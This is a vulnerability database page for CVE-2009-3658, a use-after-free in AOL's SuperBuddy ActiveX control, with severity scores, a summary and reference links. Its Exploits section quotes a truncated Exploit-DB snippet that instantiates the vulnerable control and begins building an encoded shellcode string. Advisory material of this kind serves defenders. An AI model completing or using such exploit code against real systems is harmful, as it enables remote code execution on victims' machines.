Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
8.8
CVSSv3

CVE-2009-3658

Published: 09/10/2009 Updated: 03/02/2024
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Use-after-free vulnerability in the Sb.SuperBuddy.1 ActiveX control (sb.dll) in America Online (AOL) 9.5.0.1 allows remote malicious users to trigger memory corruption or possibly execute arbitrary code via a malformed argument to the SetSuperBuddy method.

Vulnerable Product Search on Vulmon Subscribe to Product

aol superbuddy activex control 9.5.0.1

Exploits

Exploit DB: AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution
<script language='vbscript'> Set obj = CreateObject("SbSuperBuddy1") </script> <script language='javascript'> shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" ...

References

CWE-416http://www.vupen.com/english/advisories/2009/2812http://secunia.com/advisories/36919http://retrogod.altervista.org/9sg_aol_91_superbuddy.htmlhttp://www.securityfocus.com/bid/36580https://exchange.xforce.ibmcloud.com/vulnerabilities/53614https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6704http://www.securityfocus.com/archive/1/506889/100/0/threadedhttps://nvd.nist.govhttps://www.exploit-db.com/exploits/9992/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2023-30310CVE-2024-21683CVE-2024-22187chromedeserializationXPath injectionCVE-2024-27842denial of serviceCVE-2024-24851googleCVE-2024-35400
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook